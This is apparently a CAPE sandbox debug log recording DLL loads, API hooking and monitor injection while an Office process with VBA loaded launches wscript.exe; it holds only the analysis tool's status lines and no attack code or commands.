2025-12-08 08:32:05,046 [root] DEBUG: 3284: DLL loaded at 0x757A0000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2025-12-08 08:32:05,671 [root] DEBUG: 3284: api-rate-cap: NtWaitForSingleObject hook disabled due to rate
2025-12-08 08:32:05,750 [root] DEBUG: 3284: DLL loaded at 0x75F60000: C:\Windows\system32\setupapi (0x19d000 bytes).
2025-12-08 08:32:05,765 [root] DEBUG: 3284: DLL loaded at 0x755D0000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2025-12-08 08:32:05,765 [root] DEBUG: 3284: DLL loaded at 0x757A0000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2025-12-08 08:32:05,765 [root] DEBUG: 3284: DLL loaded at 0x75F60000: C:\Windows\system32\setupapi (0x19d000 bytes).
2025-12-08 08:32:05,765 [root] DEBUG: 3284: DLL loaded at 0x755D0000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2025-12-08 08:32:05,765 [root] DEBUG: 3284: DLL loaded at 0x757A0000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2025-12-08 08:32:05,781 [root] DEBUG: 3284: DLL loaded at 0x6F620000: C:\Windows\system32\d3d11 (0x175000 bytes).
2025-12-08 08:32:05,796 [root] DEBUG: 3284: DLL loaded at 0x62810000: C:\Windows\system32\D3D10Warp (0x1e9000 bytes).
2025-12-08 08:32:05,796 [root] DEBUG: 3284: DLL loaded at 0x75F60000: C:\Windows\system32\setupapi (0x19d000 bytes).
2025-12-08 08:32:05,796 [root] DEBUG: 3284: DLL loaded at 0x755D0000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2025-12-08 08:32:05,812 [root] DEBUG: 3284: DLL loaded at 0x757A0000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2025-12-08 08:32:05,812 [root] DEBUG: 3284: DLL loaded at 0x75F60000: C:\Windows\system32\setupapi (0x19d000 bytes).
2025-12-08 08:32:05,812 [root] DEBUG: 3284: DLL loaded at 0x755D0000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2025-12-08 08:32:05,812 [root] DEBUG: 3284: DLL loaded at 0x757A0000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2025-12-08 08:32:05,843 [root] DEBUG: 3284: DLL loaded at 0x6DE10000: C:\Windows\system32\mscoree (0x4a000 bytes).
2025-12-08 08:32:05,843 [root] DEBUG: 3284: DLL loaded at 0x6C910000: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei (0x8d000 bytes).
2025-12-08 08:32:05,906 [root] DEBUG: 3284: DLL loaded at 0x62530000: C:\Windows\system32\DWrite (0x135000 bytes).
2025-12-08 08:32:05,921 [root] DEBUG: 3284: DLL loaded at 0x62340000: C:\Program Files\Common Files\Microsoft Shared\Office16\riched20 (0x1ec000 bytes).
2025-12-08 08:32:05,937 [root] DEBUG: 3284: DLL loaded at 0x76100000: C:\Windows\system32\CLBCatQ (0x83000 bytes).
2025-12-08 08:32:05,937 [root] DEBUG: 3284: DLL loaded at 0x72B10000: C:\Windows\System32\netprofm (0x5a000 bytes).
2025-12-08 08:32:05,937 [root] DEBUG: 3284: DLL loaded at 0x72C90000: C:\Windows\System32\nlaapi (0x10000 bytes).
2025-12-08 08:32:05,937 [root] DEBUG: 3284: DLL loaded at 0x74ED0000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2025-12-08 08:32:05,953 [root] DEBUG: 3284: DLL loaded at 0x74C60000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2025-12-08 08:32:05,953 [root] DEBUG: 3284: DLL loaded at 0x75450000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2025-12-08 08:32:05,953 [root] DEBUG: 3284: DLL loaded at 0x72C80000: C:\Windows\System32\npmproxy (0x8000 bytes).
2025-12-08 08:32:05,953 [root] DEBUG: 3284: DLL loaded at 0x77630000: C:\Windows\system32\Normaliz (0x3000 bytes).
2025-12-08 08:32:05,953 [root] DEBUG: 3284: DLL loaded at 0x75E10000: C:\Windows\system32\urlmon (0x14a000 bytes).
2025-12-08 08:32:05,953 [root] DEBUG: 3284: DLL loaded at 0x75790000: C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2025-12-08 08:32:05,953 [root] DEBUG: 3284: DLL loaded at 0x757E0000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2025-12-08 08:32:05,953 [root] DEBUG: 3284: DLL loaded at 0x755C0000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2025-12-08 08:32:05,953 [root] DEBUG: 3284: DLL loaded at 0x75610000: C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0 (0x4000 bytes).
2025-12-08 08:32:05,953 [root] DEBUG: 3284: DLL loaded at 0x75620000: C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0 (0x4000 bytes).
2025-12-08 08:32:05,968 [root] DEBUG: 3284: DLL loaded at 0x75600000: C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2025-12-08 08:32:05,968 [root] DEBUG: 3284: DLL loaded at 0x761B0000: C:\Windows\system32\iertutil (0x232000 bytes).
2025-12-08 08:32:05,984 [root] DEBUG: 3284: DLL loaded at 0x75920000: C:\Windows\system32\WININET (0x1e4000 bytes).
2025-12-08 08:32:05,984 [root] DEBUG: 3284: api-rate-cap: GetSystemTimeAsFileTime hook disabled due to rate
2025-12-08 08:32:05,984 [root] DEBUG: 3284: api-rate-cap: GetSystemTimeAsFileTime hook disabled due to rate
2025-12-08 08:32:05,984 [root] DEBUG: 3284: api-rate-cap: NtDelayExecution hook disabled due to rate
2025-12-08 08:32:05,984 [root] DEBUG: 3284: DLL loaded at 0x75350000: C:\Windows\system32\Secur32 (0x8000 bytes).
2025-12-08 08:32:06,000 [root] DEBUG: 3284: DLL loaded at 0x6DDA0000: C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\osppc (0x2d000 bytes).
2025-12-08 08:32:06,000 [root] DEBUG: 3284: DLL loaded at 0x72CD0000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2025-12-08 08:32:06,000 [root] DEBUG: 3284: api-rate-cap: LdrGetProcedureAddress hook disabled due to rate
2025-12-08 08:32:06,000 [root] DEBUG: 3284: api-rate-cap: LdrGetProcedureAddress hook disabled due to rate
2025-12-08 08:32:06,000 [root] DEBUG: 3284: api-rate-cap: LdrGetProcedureAddress hook disabled due to rate
2025-12-08 08:32:06,109 [root] DEBUG: 3284: DLL loaded at 0x61630000: C:\Program Files\Microsoft Office\root\Office16\oart (0xd0a000 bytes).
2025-12-08 08:32:06,156 [root] DEBUG: 3284: DLL loaded at 0x61540000: C:\Program Files\Common Files\Microsoft Shared\Office16\ADAL (0xed000 bytes).
2025-12-08 08:32:06,156 [root] DEBUG: 3284: DLL loaded at 0x72BF0000: C:\Windows\system32\WINHTTP (0x58000 bytes).
2025-12-08 08:32:06,156 [root] DEBUG: 3284: DLL loaded at 0x72BA0000: C:\Windows\system32\webio (0x50000 bytes).
2025-12-08 08:32:06,156 [root] DEBUG: 3284: DLL loaded at 0x75000000: C:\Windows\system32\ncrypt (0x39000 bytes).
2025-12-08 08:32:06,171 [root] DEBUG: 3284: DLL loaded at 0x73640000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2025-12-08 08:32:06,171 [root] DEBUG: 3284: DLL loaded at 0x736D0000: C:\Windows\system32\WINNSI (0x7000 bytes).
2025-12-08 08:32:06,171 [root] DEBUG: 3284: DLL loaded at 0x73AE0000: C:\Windows\system32\SAMCLI (0xf000 bytes).
2025-12-08 08:32:06,171 [root] DEBUG: 3284: hook_api: Warning - NetUserGetInfo export address 0x73B1528E differs from GetProcAddress -> 0x73AE1BE2 (SAMCLI.DLL::0x1be2)
2025-12-08 08:32:06,171 [root] DEBUG: 3284: DLL loaded at 0x73AF0000: C:\Windows\system32\WKSCLI (0xf000 bytes).
2025-12-08 08:32:06,171 [root] DEBUG: 3284: hook_api: Warning - NetGetJoinInformation export address 0x73B14AD2 differs from GetProcAddress -> 0x73AF2C3F (WKSCLI.DLL::0x2c3f)
2025-12-08 08:32:06,171 [root] DEBUG: 3284: hook_api: Warning - NetUserGetLocalGroups export address 0x73B152A4 differs from GetProcAddress -> 0x73AE28AA (SAMCLI.DLL::0x28aa)
2025-12-08 08:32:06,171 [root] DEBUG: 3284: DLL loaded at 0x74D20000: C:\Windows\system32\LOGONCLI (0x22000 bytes).
2025-12-08 08:32:06,171 [root] DEBUG: 3284: hook_api: Warning - DsEnumerateDomainTrustsW export address 0x73B13C9E differs from GetProcAddress -> 0x74D2B1FA (LOGONCLI.DLL::0xb1fa)
2025-12-08 08:32:06,171 [root] DEBUG: 3284: DLL loaded at 0x73B10000: C:\Windows\system32\netapi32 (0x11000 bytes).
2025-12-08 08:32:06,187 [root] DEBUG: 3284: DLL loaded at 0x73B00000: C:\Windows\system32\netutils (0x9000 bytes).
2025-12-08 08:32:06,187 [root] DEBUG: 3284: DLL loaded at 0x752C0000: C:\Windows\system32\srvcli (0x19000 bytes).
2025-12-08 08:32:06,187 [root] DEBUG: 3284: DLL loaded at 0x6FB50000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0 (0x4000 bytes).
2025-12-08 08:32:06,187 [root] DEBUG: 3284: DLL loaded at 0x74E90000: C:\Windows\system32\mswsock (0x3c000 bytes).
2025-12-08 08:32:06,187 [root] DEBUG: 3284: DLL loaded at 0x74D50000: C:\Windows\system32\DNSAPI (0x44000 bytes).
2025-12-08 08:32:06,203 [root] DEBUG: 3284: DLL loaded at 0x74E80000: C:\Windows\System32\wship6 (0x6000 bytes).
2025-12-08 08:32:06,203 [root] DEBUG: 3284: DLL loaded at 0x735C0000: C:\Windows\system32\dhcpcsvc6 (0xd000 bytes).
2025-12-08 08:32:06,218 [root] DEBUG: 3284: DLL loaded at 0x73540000: C:\Windows\system32\dhcpcsvc (0x12000 bytes).
2025-12-08 08:32:06,218 [root] DEBUG: 3284: DLL loaded at 0x749F0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2025-12-08 08:32:06,249 [root] DEBUG: 3284: DLL loaded at 0x61140000: C:\Program Files\Microsoft Office\root\Office16\gfx (0x3f1000 bytes).
2025-12-08 08:32:06,249 [root] DEBUG: 3284: DLL loaded at 0x6FCA0000: C:\Windows\system32\MSIMG32 (0x5000 bytes).
2025-12-08 08:32:06,265 [root] DEBUG: 3284: DLL loaded at 0x73E50000: C:\Windows\system32\XmlLite (0x2f000 bytes).
2025-12-08 08:32:06,265 [root] DEBUG: 3284: DLL loaded at 0x72500000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2025-12-08 08:32:06,281 [root] DEBUG: 3284: DLL loaded at 0x74B90000: C:\Windows\system32\credssp (0x8000 bytes).
2025-12-08 08:32:06,281 [root] DEBUG: 3284: DLL loaded at 0x755D0000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2025-12-08 08:32:06,375 [root] DEBUG: 3284: DLL loaded at 0x60580000: C:\Program Files\Microsoft Office\root\Office16\chart (0xbbb000 bytes).
2025-12-08 08:32:06,453 [root] DEBUG: 3284: DLL loaded at 0x72620000: C:\Windows\system32\napinsp (0x10000 bytes).
2025-12-08 08:32:06,453 [root] DEBUG: 3284: DLL loaded at 0x70F50000: C:\Windows\system32\pnrpnsp (0x12000 bytes).
2025-12-08 08:32:06,453 [root] DEBUG: 3284: DLL loaded at 0x72610000: C:\Windows\System32\winrnr (0x8000 bytes).
2025-12-08 08:32:06,468 [root] DEBUG: 3284: DLL loaded at 0x73600000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2025-12-08 08:32:06,500 [root] DEBUG: 3284: api-rate-cap: RegQueryValueExW hook disabled due to rate
2025-12-08 08:32:06,500 [root] DEBUG: 3284: api-rate-cap: NtQueryValueKey hook disabled due to rate
2025-12-08 08:32:06,531 [root] DEBUG: 3284: DLL loaded at 0x75F60000: C:\Windows\system32\SETUPAPI (0x19d000 bytes).
2025-12-08 08:32:06,531 [root] DEBUG: 3284: DLL loaded at 0x757A0000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2025-12-08 08:32:06,546 [root] DEBUG: 3284: DLL loaded at 0x742B0000: C:\Windows\system32\propsys (0xf5000 bytes).
2025-12-08 08:32:06,546 [root] DEBUG: 3284: DLL loaded at 0x73A90000: C:\Windows\system32\ntmarta (0x21000 bytes).
2025-12-08 08:32:06,546 [root] DEBUG: 3284: DLL loaded at 0x75810000: C:\Windows\system32\WLDAP32 (0x45000 bytes).
2025-12-08 08:32:06,546 [root] DEBUG: 3284: DLL loaded at 0x74BA0000: C:\Windows\system32\bcryptprimitives (0x3d000 bytes).
2025-12-08 08:32:06,562 [root] DEBUG: 3284: DLL loaded at 0x72260000: C:\Windows\system32\MPR (0x12000 bytes).
2025-12-08 08:32:06,625 [root] DEBUG: 3284: DLL loaded at 0x5FFF0000: C:\Program Files\Microsoft Office\root\Office16\GKExcel (0x402000 bytes).
2025-12-08 08:32:06,781 [root] DEBUG: 3284: DLL loaded at 0x6DD70000: C:\Windows\system32\mlang (0x2e000 bytes).
2025-12-08 08:32:06,796 [root] DEBUG: 3284: DLL loaded at 0x722C0000: C:\Windows\System32\msxml6 (0x158000 bytes).
2025-12-08 08:32:06,828 [root] DEBUG: 3284: DLL loaded at 0x5FD60000: C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7 (0x28f000 bytes).
2025-12-08 08:32:06,843 [root] DEBUG: 3284: DLL loaded at 0x5FCD0000: C:\Windows\system32\UIAutomationCore (0x8c000 bytes).
2025-12-08 08:32:06,843 [root] DEBUG: 3284: DLL loaded at 0x77640000: C:\Windows\system32\PSAPI (0x5000 bytes).
2025-12-08 08:32:06,859 [root] DEBUG: 3284: DLL loaded at 0x6C8D0000: C:\Windows\system32\OLEACC (0x3c000 bytes).
2025-12-08 08:32:06,859 [root] DEBUG: 3284: DLL loaded at 0x721D0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\COMCTL32 (0x84000 bytes).
2025-12-08 08:32:06,875 [root] DEBUG: 3284: DLL loaded at 0x5FC10000: C:\Windows\system32\MSVCR100 (0xbf000 bytes).
2025-12-08 08:32:06,875 [root] DEBUG: 3284: DLL loaded at 0x753F0000: C:\Windows\system32\SXS (0x5f000 bytes).
2025-12-08 08:32:06,906 [root] DEBUG: 3284: DLL loaded at 0x5F9E0000: C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI (0x229000 bytes).
2025-12-08 08:32:06,906 [root] DEBUG: 3284: DLL loaded at 0x6C8A0000: C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL (0x26000 bytes).
2025-12-08 08:32:07,000 [root] DEBUG: 3284: DLL loaded at 0x6F850000: C:\Windows\system32\d3d10_1 (0x2c000 bytes).
2025-12-08 08:32:07,000 [root] DEBUG: 3284: DLL loaded at 0x6F7F0000: C:\Windows\system32\d3d10_1core (0x41000 bytes).
2025-12-08 08:32:07,015 [root] DEBUG: 3284: DLL loaded at 0x73D20000: C:\Windows\system32\WindowsCodecs (0x130000 bytes).
2025-12-08 08:32:07,062 [root] DEBUG: 3284: DLL loaded at 0x5F860000: C:\Program Files\Common Files\Microsoft Shared\Office16\MSPTLS (0x11a000 bytes).
2025-12-08 08:32:07,062 [root] DEBUG: 3284: api-rate-cap: RegOpenKeyExW hook disabled due to rate
2025-12-08 08:32:07,078 [root] DEBUG: 3284: api-rate-cap: RegCloseKey hook disabled due to rate
2025-12-08 08:32:07,078 [root] DEBUG: 3284: api-rate-cap: NtClose hook disabled due to rate
2025-12-08 08:32:07,078 [root] DEBUG: 3284: api-rate-cap: NtOpenKey hook disabled due to rate
2025-12-08 08:32:07,093 [root] DEBUG: 3284: api-rate-cap: NtQueryPerformanceCounter hook disabled due to rate
2025-12-08 08:32:07,125 [root] DEBUG: 3284: DLL loaded at 0x75390000: C:\Windows\system32\apphelp (0x4c000 bytes).
2025-12-08 08:32:07,140 [root] DEBUG: 3284: DLL loaded at 0x6EC30000: C:\Windows\System32\shdocvw (0x2e000 bytes).
2025-12-08 08:32:07,156 [root] DEBUG: 3284: set_hooks_by_export_directory: Hooked 0 out of 434 functions
2025-12-08 08:32:07,156 [root] DEBUG: 3284: DLL loaded at 0x6DD50000: C:\Windows\system32\packager (0x13000 bytes).
2025-12-08 08:32:07,171 [root] DEBUG: 3284: DLL loaded at 0x6EF30000: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\FileSyncShell (0x1ff000 bytes).
2025-12-08 08:32:07,187 [root] DEBUG: 3284: DLL loaded at 0x6EE40000: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\MSVCP120 (0x71000 bytes).
2025-12-08 08:32:07,187 [root] DEBUG: 3284: DLL loaded at 0x6ED50000: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\MSVCR120 (0xee000 bytes).
2025-12-08 08:32:07,187 [root] DEBUG: 3284: DLL loaded at 0x6EBE0000: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\LoggingPlatform (0x18000 bytes).
2025-12-08 08:32:07,187 [root] DEBUG: 3284: DLL loaded at 0x6EBD0000: C:\Windows\system32\WSOCK32 (0x7000 bytes).
2025-12-08 08:32:07,187 [root] DEBUG: 3284: DLL loaded at 0x6EB80000: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Telemetry (0x4f000 bytes).
2025-12-08 08:32:07,203 [root] DEBUG: 3284: DLL loaded at 0x73220000: C:\Windows\system32\Cabinet (0x15000 bytes).
2025-12-08 08:32:07,203 [root] DEBUG: 3284: DLL loaded at 0x74200000: C:\Windows\system32\POWRPROF (0x25000 bytes).
2025-12-08 08:32:07,218 [root] DEBUG: 3284: set_hooks_by_export_directory: Hooked 0 out of 434 functions
2025-12-08 08:32:07,218 [root] DEBUG: 3284: DLL loaded at 0x6EB40000: C:\Windows\system32\EhStorShell (0x31000 bytes).
2025-12-08 08:32:07,218 [root] DEBUG: 3284: DLL loaded at 0x6EAD0000: C:\Windows\System32\cscui (0x6a000 bytes).
2025-12-08 08:32:07,218 [root] DEBUG: 3284: DLL loaded at 0x6EF20000: C:\Windows\System32\CSCDLL (0x9000 bytes).
2025-12-08 08:32:07,218 [root] DEBUG: 3284: DLL loaded at 0x6F130000: C:\Windows\system32\CSCAPI (0xb000 bytes).
2025-12-08 08:32:07,218 [root] DEBUG: 3284: DLL loaded at 0x6ECE0000: C:\Windows\system32\ntshrui (0x70000 bytes).
2025-12-08 08:32:07,234 [root] DEBUG: 3284: DLL loaded at 0x752C0000: C:\Windows\system32\srvcli (0x19000 bytes).
2025-12-08 08:32:07,234 [root] DEBUG: 3284: DLL loaded at 0x73530000: C:\Windows\system32\slc (0xa000 bytes).
2025-12-08 08:32:07,343 [root] DEBUG: 3284: DLL loaded at 0x5F690000: C:\Windows\system32\comsvcs (0x136000 bytes).
2025-12-08 08:32:07,343 [root] DEBUG: 3284: DLL loaded at 0x73850000: C:\Windows\system32\ATL (0x14000 bytes).
2025-12-08 08:32:07,359 [root] DEBUG: 3284: DLL loaded at 0x5F670000: C:\Windows\system32\mtxoci (0x20000 bytes).
2025-12-08 08:32:07,421 [lib.api.process] INFO: Monitor config for <Process 556 svchost.exe>: C:\tmp76j_8pz8\dll\556.ini
2025-12-08 08:32:07,421 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp76j_8pz8\dll\AVhNcK.dll, loader C:\tmp76j_8pz8\bin\Hlvfqvk.exe
2025-12-08 08:32:07,437 [root] DEBUG: Loader: Injecting process 556 with C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:32:07,437 [root] DEBUG: 556: Python path set to 'C:\Python38'.
2025-12-08 08:32:07,437 [root] INFO: Disabling sleep skipping.
2025-12-08 08:32:07,437 [root] DEBUG: 556: Dropped file limit defaulting to 100.
2025-12-08 08:32:07,437 [root] DEBUG: 556: parent_has_path: unable to get path for parent process 376
2025-12-08 08:32:07,437 [root] DEBUG: 556: YaraInit: Compiled 41 rule files
2025-12-08 08:32:07,437 [root] DEBUG: 556: YaraInit: Compiled rules saved to file C:\tmp76j_8pz8\data\yara\capemon.yac
2025-12-08 08:32:07,437 [root] DEBUG: 556: YaraScan: Scanning 0x00F00000, size 0x73ca
2025-12-08 08:32:07,437 [root] DEBUG: 556: Monitor initialised: 32-bit capemon loaded in process 556 at 0x6c9a0000, thread 1360, image base 0xf00000, stack from 0x1086000-0x1090000
2025-12-08 08:32:07,437 [root] DEBUG: 556: Commandline: C:\Windows\system32\svchost.exe -k DcomLaunch
2025-12-08 08:32:07,437 [root] DEBUG: 556: GetAddressByYara: ModuleBase 0x774E0000 FunctionName LdrpCallInitRoutine
2025-12-08 08:32:07,453 [root] DEBUG: 556: hook_api: LdrpCallInitRoutine export address 0x77538810 obtained via GetFunctionAddress
2025-12-08 08:32:07,453 [root] DEBUG: 556: hook_api: Warning - CreateRemoteThreadEx export address 0x764AF98F differs from GetProcAddress -> 0x754EBB18 (KERNELBASE.dll::0xbb18)
2025-12-08 08:32:07,453 [root] DEBUG: 556: hook_api: Warning - UpdateProcThreadAttribute export address 0x764B020F differs from GetProcAddress -> 0x754F43FB (KERNELBASE.dll::0x143fb)
2025-12-08 08:32:07,453 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 08:32:07,453 [root] DEBUG: 556: set_hooks: Unable to hook GetCommandLineA
2025-12-08 08:32:07,453 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 08:32:07,453 [root] DEBUG: 556: set_hooks: Unable to hook GetCommandLineW
2025-12-08 08:32:07,453 [root] DEBUG: 556: Hooked 611 out of 613 functions
2025-12-08 08:32:07,453 [root] DEBUG: 556: WoW64 not detected.
2025-12-08 08:32:07,453 [root] INFO: Loaded monitor into process with pid 556
2025-12-08 08:32:07,468 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2025-12-08 08:32:07,468 [root] DEBUG: Successfully injected DLL C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:32:07,468 [lib.api.process] INFO: Injected into 32-bit <Process 556 svchost.exe>
2025-12-08 08:32:07,484 [root] DEBUG: 3284: api-rate-cap: RtlSetCurrentTransaction hook disabled due to rate
2025-12-08 08:32:07,484 [root] DEBUG: 3284: api-rate-cap: NtQueryKey hook disabled due to rate
2025-12-08 08:32:09,484 [root] DEBUG: 3284: DLL loaded at 0x5F5D0000: C:\Program Files\WinRAR\rarext (0xa0000 bytes).
2025-12-08 08:32:09,484 [root] DEBUG: 3284: DLL loaded at 0x5F570000: C:\Windows\system32\zipfldr (0x52000 bytes).
2025-12-08 08:32:09,500 [root] DEBUG: 3284: DLL loaded at 0x5F540000: C:\Windows\system32\syncui (0x29000 bytes).
2025-12-08 08:32:09,500 [root] DEBUG: 3284: DLL loaded at 0x5F520000: C:\Windows\system32\SYNCENG (0x16000 bytes).
2025-12-08 08:32:09,500 [root] DEBUG: 3284: DLL loaded at 0x6EC20000: C:\Windows\system32\LINKINFO (0x9000 bytes).
2025-12-08 08:32:09,515 [root] DEBUG: 3284: DLL loaded at 0x5F4F0000: C:\Windows\system32\twext (0x27000 bytes).
2025-12-08 08:32:09,531 [root] DEBUG: 3284: DLL loaded at 0x73B00000: C:\Windows\system32\netutils (0x9000 bytes).
2025-12-08 08:32:09,531 [root] DEBUG: 3284: DLL loaded at 0x70420000: C:\Windows\System32\cscobj (0x25000 bytes).
2025-12-08 08:32:09,546 [root] DEBUG: 3284: DLL loaded at 0x5F4D0000: C:\Program Files\7-Zip\7-zip (0x13000 bytes).
2025-12-08 08:32:09,562 [root] INFO: Announced 32-bit process name: explorer.exe pid: 1236
2025-12-08 08:32:09,562 [lib.api.process] INFO: Monitor config for <Process 1236 explorer.exe>: C:\tmp76j_8pz8\dll\1236.ini
2025-12-08 08:32:09,562 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp76j_8pz8\dll\AVhNcK.dll, loader C:\tmp76j_8pz8\bin\Hlvfqvk.exe
2025-12-08 08:32:09,562 [root] DEBUG: Loader: Injecting process 1236 with C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:32:09,578 [root] DEBUG: 1236: Python path set to 'C:\Python38'.
2025-12-08 08:32:09,578 [root] DEBUG: 1236: Dropped file limit defaulting to 100.
2025-12-08 08:32:09,578 [root] INFO: Disabling sleep skipping.
2025-12-08 08:32:09,578 [root] DEBUG: 1236: YaraInit: Compiled rules loaded from existing file C:\tmp76j_8pz8\data\yara\capemon.yac
2025-12-08 08:32:09,578 [root] DEBUG: 1236: YaraScan: Scanning 0x00750000, size 0x2d83d0
2025-12-08 08:32:09,593 [root] DEBUG: 1236: Monitor initialised: 32-bit capemon loaded in process 1236 at 0x6c9a0000, thread 2412, image base 0x750000, stack from 0x4fe2000-0x4ff0000
2025-12-08 08:32:09,593 [root] DEBUG: 1236: Commandline: C:\Windows\Explorer.EXE
2025-12-08 08:32:09,593 [root] DEBUG: 1236: GetAddressByYara: ModuleBase 0x774E0000 FunctionName LdrpCallInitRoutine
2025-12-08 08:32:09,593 [root] DEBUG: 1236: hook_api: LdrpCallInitRoutine export address 0x77538810 obtained via GetFunctionAddress
2025-12-08 08:32:09,593 [root] DEBUG: 1236: hook_api: Warning - CreateRemoteThreadEx export address 0x764AF98F differs from GetProcAddress -> 0x754EBB18 (KERNELBASE.dll::0xbb18)
2025-12-08 08:32:09,593 [root] DEBUG: 1236: hook_api: Warning - UpdateProcThreadAttribute export address 0x764B020F differs from GetProcAddress -> 0x754F43FB (KERNELBASE.dll::0x143fb)
2025-12-08 08:32:09,593 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 08:32:09,593 [root] DEBUG: 1236: set_hooks: Unable to hook GetCommandLineA
2025-12-08 08:32:09,593 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 08:32:09,609 [root] DEBUG: 1236: set_hooks: Unable to hook GetCommandLineW
2025-12-08 08:32:09,609 [root] DEBUG: 1236: Hooked 611 out of 613 functions
2025-12-08 08:32:09,609 [root] DEBUG: 1236: WoW64 not detected.
2025-12-08 08:32:09,609 [root] INFO: Loaded monitor into process with pid 1236
2025-12-08 08:32:09,609 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2025-12-08 08:32:09,609 [root] DEBUG: Successfully injected DLL C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:32:09,609 [lib.api.process] INFO: Injected into 32-bit <Process 1236 explorer.exe>
2025-12-08 08:32:09,609 [root] DEBUG: 1236: api-rate-cap: memcpy hook disabled due to rate
2025-12-08 08:32:09,625 [root] DEBUG: 3284: DLL loaded at 0x5F4B0000: C:\Windows\system32\thumbcache (0x16000 bytes).
2025-12-08 08:32:09,625 [root] DEBUG: 1236: caller_dispatch: Added region at 0x00750000 to tracked regions list (user32::GetKeyboardLayout returns to 0x00758E6E, thread 528).
2025-12-08 08:32:09,625 [root] DEBUG: 1236: YaraScan: Scanning 0x00750000, size 0x2d83d0
2025-12-08 08:32:09,640 [root] DEBUG: 1236: ProcessImageBase: Main module image at 0x00750000 unmodified (entropy change 0.000000e+00)
2025-12-08 08:32:09,656 [root] DEBUG: 3284: api-rate-cap: RegEnumValueW hook disabled due to rate
2025-12-08 08:32:09,671 [root] DEBUG: 3284: CreateProcessHandler: Injection info set for new process 1956: C:\Windows\System32\WScript.exe, ImageBase: 0x00BE0000
2025-12-08 08:32:09,687 [root] INFO: Announced 32-bit process name: wscript.exe pid: 1956
2025-12-08 08:32:09,687 [lib.api.process] INFO: Monitor config for <Process 1956 wscript.exe>: C:\tmp76j_8pz8\dll\1956.ini
2025-12-08 08:32:09,687 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp76j_8pz8\dll\AVhNcK.dll, loader C:\tmp76j_8pz8\bin\Hlvfqvk.exe
2025-12-08 08:32:09,687 [root] DEBUG: Loader: Injecting process 1956 (thread 232) with C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:32:09,687 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 08:32:09,687 [root] DEBUG: Successfully injected DLL C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:32:09,687 [lib.api.process] INFO: Injected into 32-bit <Process 1956 wscript.exe>
2025-12-08 08:32:09,703 [root] INFO: Announced 32-bit process name: wscript.exe pid: 1956
2025-12-08 08:32:09,703 [lib.api.process] INFO: Monitor config for <Process 1956 wscript.exe>: C:\tmp76j_8pz8\dll\1956.ini
2025-12-08 08:32:09,703 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp76j_8pz8\dll\AVhNcK.dll, loader C:\tmp76j_8pz8\bin\Hlvfqvk.exe
2025-12-08 08:32:09,703 [root] DEBUG: Loader: Injecting process 1956 (thread 232) with C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:32:09,703 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 08:32:09,703 [root] DEBUG: Successfully injected DLL C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:32:09,703 [lib.api.process] INFO: Injected into 32-bit <Process 1956 wscript.exe>
2025-12-08 08:32:09,703 [root] DEBUG: 3284: DLL loaded at 0x6FC90000: C:\Windows\system32\sfc (0x3000 bytes).
